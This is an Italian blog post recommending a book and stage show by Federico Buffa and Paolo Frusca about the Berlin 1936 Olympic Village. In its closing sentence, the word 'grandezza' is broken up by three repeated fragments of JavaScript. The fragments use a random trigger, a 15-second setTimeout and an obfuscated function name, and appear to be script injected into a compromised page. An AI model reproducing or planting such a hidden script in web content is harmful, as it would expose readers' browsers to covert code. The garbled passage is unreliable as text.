The Locker Room

L’ULTIMA ESTATE DI BERLINO

5 agosto 2016 Almanacco, Books, Speak About
owens

Il Villaggio Olimpico di Berlino nel 1936 si trasformò in una sorta di piccolo universo dove si intrecciarono le storie di personaggi politici e sportivi destinati ad entrare nella storia, uomini e donne le cui imprese saranno consegnate all’eternità, all’oblio o ad un destino tragico.
Attori e spettatori inconsapevoli dell’immane disperazione che avrebbe invaso il Mondo intero proprio al termine di quei Giochi Olimpici.
Il libro scritto da Federico Buffa e Paolo Frusca, proprio come lo spettacolo teatrale, racconta la storia e gli uomini. Racconta l’umanità, le passioni e lo sport che il colosso nazista, all’ombra del quale era nata quell’Olimpiade, non riuscì mai a soffocare.

Una lettura che consigliamo soprattutto durante questo gioioso periodo di sport per ricordare la potente grandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andezza delle Olimpiadi e dello spirito Olimpico.

berlin